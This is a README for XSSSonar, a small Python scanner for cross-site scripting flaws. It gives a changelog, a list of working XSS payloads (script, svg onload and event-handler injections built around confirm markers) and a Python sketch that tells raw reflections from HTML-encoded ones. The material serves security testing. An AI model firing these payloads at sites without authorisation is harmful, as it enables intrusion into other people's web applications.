Little python tool to look for XSS vulnerabilities in a web page

XSSSonar

Little tool to look for XSS vulnerabilities in a web page.

XSS Sonar Screenshot

Info

This code is just a draft. There are some errors still to be corrected, and sometimes false positives occur.
Tested with Python 2.7.9 on Debian Jessie. I may write it for Python 3.x.

ChangeLog

0.1.6
[-] Fixed some bugs
[-] Added scan on list of POST parameters
[-] Added option to assign default value to a POST parameter
[-] Added help function

0.1.5a
[-] Fixed some bugs
[-] Less than 400 lines of code

0.1.5
[-] Added scan on POST parameters
[-] Changed name

0.1.4a
[-] Added stopwatch to know the time spent to check each URL
[-] Same features with 1500 fewer lines of code

0.1.4
[-] Check a single URL or a list.txt of sites

List of XSS Payloads

'">"'><img src=x onerror=confirm`XSS`>
"> <script>alert`XSS`</script>
'">"'><svg onload=confirm`XSS`>
"',;</script><script>confirm`XSS`</script>
'><svg onload=confirm`XSS`>
"><svg/onload=confirm`XSS`//
"><details/open/ontoggle=confirm`XSS`>
" onfocus="confirm`XSS`" autofocus=""
" onclick="confirm`XSS`"
" onmouseover="confirm`XSS`"
\"-confirm`XSS`//
\'-confirm`XSS`//
"-confirm`XSS`-"'-confirm`XSS`-'
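
The Info section notes that false positives occur. A well-known cause in reflection-based checks is a payload that comes back HTML-encoded and is therefore inert. The Python 3 sketch below is an added example, not code from xsssonar.py (the page does not document how the tool decides). The two page templates and all function names are hypothetical. It separates raw from encoded reflection for three payloads taken from the list above.

```python
import html

# Three payloads copied from the list above (raw string keeps the backslash).
PAYLOADS = r'''
"><svg/onload=confirm`XSS`//
" onmouseover="confirm`XSS`"
\"-confirm`XSS`//
'''.strip().splitlines()

MARKER = "confirm`XSS`"  # substring shared by every payload in the list


def render_unescaped(q):
    """Constructed page that echoes the parameter without output encoding."""
    return '<input name="q" value="%s">' % q


def render_escaped(q):
    """Same constructed page with HTML-entity encoding applied on output."""
    return '<input name="q" value="%s">' % html.escape(q, quote=True)


def naive_hit(body):
    """Marker-only check: cannot tell encoded from raw reflection."""
    return MARKER in body


def classify_reflection(body, payload):
    """Return 'raw', 'encoded' or 'absent' for one payload in one response."""
    if payload in body:
        return "raw"        # metacharacters survived: needs fixing
    if payload in html.unescape(body):
        return "encoded"    # reflected only as entities: inert in this context
    return "absent"


def compare(render):
    """Run both checks over every payload for one rendering function."""
    return [(naive_hit(render(p)), classify_reflection(render(p), p))
            for p in PAYLOADS]


if __name__ == "__main__":
    for name, render in (("unescaped", render_unescaped),
                         ("escaped", render_escaped)):
        for payload, result in zip(PAYLOADS, compare(render)):
            print(name, result, payload)
```

The marker-only check reports a hit on both templates, while the classifier reports `raw` only for the template that skips output encoding.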

To start

pip install fake-useragent
python xsssonar.py
